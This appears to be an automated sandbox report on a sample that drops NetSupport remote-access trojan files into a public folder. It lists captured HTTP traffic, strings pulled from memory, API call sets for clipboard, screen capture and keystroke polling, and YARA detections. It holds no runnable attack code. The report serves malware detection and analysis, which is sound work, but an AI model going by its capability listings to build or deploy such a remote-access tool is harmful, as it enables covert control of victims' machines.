61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:37:08 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f7203a5e8bd2363-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDN2muabuDV1YmuvJbYCyAYC9CLGNBg8bk%2BbqBXz3O2MIc1VvRFdsqJwbq0YkROI6bTaCOg9HNkgix49mKAnVimMvoH2wsMzl%2FQqSiPrfHtdCuW91y1E0zHliTGDWMPvBl1ijm4wLylWZyjI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: bild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2.
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp7
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp;
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspG
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLMEMH
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspM
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspU
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspc
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
                                Source: bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,5_2_11032EE0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,6_2_11032EE0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,5_2_110321E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,5_2_110076F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11113880
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11113880
                                Source: Yara matchFile source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.5322800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 7436, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7692, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 8120, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7176, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,5_2_111158B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_111158B0
                                Source: C:\Users\Public\Netstat\bild.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D77070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00D77070
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,5_2_1115DB40
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D859840_2_00D85984
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D784090_2_00D78409
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D9E8D40_2_00D9E8D4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D830E60_2_00D830E6
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7E0450_2_00D7E045
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7D1D20_2_00D7D1D2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8E94A0_2_00D8E94A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8FAC80_2_00D8FAC8
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8F25E0_2_00D8F25E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7BA1A0_2_00D7BA1A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D732030_2_00D73203
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D863F20_2_00D863F2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7DBE20_2_00D7DBE2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D9A35E0_2_00D9A35E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D92B780_2_00D92B78
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D82B3A0_2_00D82B3A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7EC970_2_00D7EC97
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7D5E40_2_00D7D5E4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D85DB90_2_00D85DB9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D82DB50_2_00D82DB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D75E960_2_00D75E96
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8F6930_2_00D8F693
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D99EB00_2_00D99EB0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8EE460_2_00D8EE46
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D73FC50_2_00D73FC5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D84FB50_2_00D84FB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7276C0_2_00D7276C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110733B05_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110295905_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11061C905_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110330105_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111632205_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111674855_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110454F05_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1101B7605_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111258B05_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1101BBA05_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11087C605_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110700905_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110804805_2_11080480
